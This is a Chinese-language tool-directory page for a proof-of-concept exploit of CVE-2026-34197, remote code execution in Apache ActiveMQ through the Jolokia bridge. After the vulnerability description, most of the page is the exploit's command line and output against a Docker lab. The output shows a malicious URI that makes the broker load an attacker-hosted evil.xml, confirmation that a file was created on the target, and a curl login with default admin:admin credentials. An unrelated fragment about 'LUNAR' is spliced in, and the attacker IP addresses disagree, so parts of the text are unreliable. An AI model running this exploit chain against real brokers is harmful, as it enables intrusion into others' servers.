Skip to content
KitploitKITPLOIT
工具博客
Log in
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

订阅源联系隐私© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-34197 — CVE-2026-34197 的概念验证漏洞利用,演示了通过 Jolokia JMX-HTTP 桥接和 Spring XML Bean 注入在 Apache ActiveMQ 中实现认证远程代码执行。 | Kitploit
工具/GitHubGitHub/lat-06/cve-2026-34197
动态分析 (沙盒)漏洞分析代码分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育实验室与实践
GitHublat-06/cve-2026-34197

CVE-2026-34197

CVE-2026-34197 的概念验证漏洞利用,演示了通过 Jolokia JMX-HTTP 桥接和 Spring XML Bean 注入在 Apache ActiveMQ 中实现认证远程代码执行。

查看仓库
184个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-34197

描述
Apache ActiveMQ Broker、Apache ActiveMQ 中存在不当输入验证、代码生成控制不当('代码注入')漏洞。Apache ActiveMQ Classic 在 Web 控制台的 /api/jolokia/ 路径下暴露了 Jolokia JMX-HTTP 桥接。默认的 Jolokia 访问策略允许对所有 ActiveMQ MBean(org.apache.activemq:*)执行 exec 操作,包括 BrokerService.addNetworkConnector(String) 和 BrokerService.addConnector(String)。经过身份验证的攻击者可以利用精心构造的 discovery URI 调用这些操作,该 URI 会触发 VM 传输的 brokerConfig 参数通过 ResourceXmlApplicationContext 加载远程 Spring XML 应用程序上下文。由于 Spring 的 ResourceXmlApplicationContext 在 BrokerService 验证配置之前实例化所有单例 bean,因此可以通过 bean 工厂方法(如 Runtime.exec())在代理的 JVM 上执行任意代码。该问题影响 Apache ActiveMQ Broker:5.19.4 之前版本,以及从 6.0.0 到 6.2.3 之前版本;Apache ActiveMQ All:5.19.4 之前版本,以及从 6.0.0 到 6.2.3 之前版本;Apache ActiveMQ:5.19.4 之前版本,以及从 6.0.0 到 6.2.3 之前版本。建议用户升级到修复该问题的 5.19.4 或 6.2.3 版本。

更多信息:链接

利用阶段

参考

Github:链接```bash ❯ docker compose up -d

# LUNAR

基于描述,LUNAR 提供用于 websec 的字符串。```bash
❯ python3 exploit_poc.py auto \
    --target http://localhost:8161 \
    --lhost 192.168.1.32 --lport 9999 \
    --cmd "touch /tmp/blahblah.txt"

======================================================================
  CVE-2026-34197 — ActiveMQ RCE via Jolokia + VM Transport
  For authorized security testing and research only.
======================================================================

[*] Target: http://localhost:8161
[*] Command: touch /tmp/blahblah.txt
[*] Serving malicious Spring XML on http://0.0.0.0:9999/evil.xml
[+] Jolokia accessible — agent version: unknown
[*] Could not discover broker name, using default 'localhost'
[*] Sending exploit payload to http://localhost:8161/api/jolokia/
[*] Malicious URI: static:(vm://evil?brokerConfig=xbean:http://192.168.1.17:9999/evil.xml)
[+] Target fetched payload: /evil.xml
[+] Target fetched payload: /evil.xml
[+] Jolokia returned 200 — exploit payload delivered
[+] Response: {
  "request": {
    "mbean": "org.apache.activemq:brokerName=localhost,type=Broker",
    "arguments": [
      "static:(vm://evil?brokerConfig=xbean:http://192.168.1.17:9999/evil.xml)"
    ],
    "type": "exec",
    "operation": "addNetworkConnector(java.lang.String)"
  },
  "value": "NC",
  "timestamp": 1775616523,
  "status": 200
}
[*] Waiting 5s for target to fetch payload...
[+] Target fetched payload: /evil.xml
[+] Target fetched payload: /evil.xml
[+] Target fetched payload: /evil.xml
[+] Target fetched payload: /evil.xml
[+] Done. Verify command execution on target.

LHOST 是计算机上的私有 IP 地址。您可以在 Windows 上使用 ipconfig,或在 Linux 上使用 ifconfig

检查 RCE```bash ❯ docker exec -it activemq-vuln ls -lah /tmp
total 16K drwxrwxrwt 1 root root 4.0K May 18 04:01 . drwxr-xr-x 1 root root 4.0K May 18 03:40 .. -rw-r--r-- 1 root root 0 May 18 04:01 blahblah.txt drwxr-xr-x 1 root root 4.0K May 18 04:06 hsperfdata_root

=> RCE 成功,在目标系统上创建了文件 `blahblah.txt`。

# 分析阶段
## 动态分析```bash
❯ docker exec activemq-vuln java -version 

openjdk version "11.0.24" 2024-07-16
OpenJDK Runtime Environment Temurin-11.0.24+8 (build 11.0.24+8)
OpenJDK 64-Bit Server VM Temurin-11.0.24+8 (build 11.0.24+8, mixed mode, sharing)
❯ docker exec activemq-vuln sh -c 'ls /opt/apache-activemq/lib | grep activemq'
activemq-broker-5.18.6.jar
activemq-client-5.18.6.jar
activemq-console-5.18.6.jar
activemq-jaas-5.18.6.jar
activemq-kahadb-store-5.18.6.jar
activemq-openwire-legacy-5.18.6.jar
activemq-protobuf-1.1.jar
activemq-rar.txt
activemq-spring-5.18.6.jar
activemq-web-5.18.6.jar

运行时日志也确认了Jolokia已启用并通过ActiveMQ Web控制台暴露:```bash INFO | ActiveMQ WebConsole available at http://0.0.0.0:8161/ INFO | ActiveMQ Jolokia REST API available at http://0.0.0.0:8161/api/jolokia/

验证连接```bash
❯ curl -i -u admin:admin \
  -H 'Origin: http://localhost:8161' \
  http://localhost:8161/api/jolokia/
HTTP/1.1 200 OK
Date: Mon, 18 May 2026 04:37:28 GMT
X-FRAME-OPTIONS: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Access-Control-Allow-Origin: http://localhost:8161
Access-Control-Allow-Credentials: true
Content-Type: text/plain;charset=utf-8
Pragma: no-cache
Expires: Mon, 18 May 2026 03:37:28 GMT
Transfer-Encoding: chunked

{"request":{"type":"version"},"value":{"agent":"1.7.1","protocol":"7.2","config":{"listenForHttpService":"true","authIgnoreCerts":"false","agentId":"172.21.0.2-42-aa61e4e-servlet","debug":"false","agentType":"servlet","policyLocation":"${prop:jolokia.conf}","agentContext":"\/jolokia","serializeException":"false","mimeType":"text\/plain","dispatcherClasses":"org.jolokia.http.Jsr160ProxyNotEnabledByDefaultAnymoreDispatcher","multicastGroup":"239.192.48.84","authMode":"basic","authMatch":"any","streaming":"true","canonicalNaming":"true","historyMaxEntries":"10","allowErrorDetails":"false","allowDnsReverseLookup":"true","realm":"jolokia","includeStackTrace":"true","multicastPort":"24884","useRestrictorService":"false","debugMaxEntries":"100"},"info":{"product":"activemq","vendor":"Apache","version":"5.18.6"}},"timestamp":1779079048,"status":200}

这意味着:

  • Jolokia 可访问
  • 使用默认凭据认证成功
  • 目标正在运行 ActiveMQ 5.18.6
  • Jolokia 代理接受了经过认证的请求
下载工具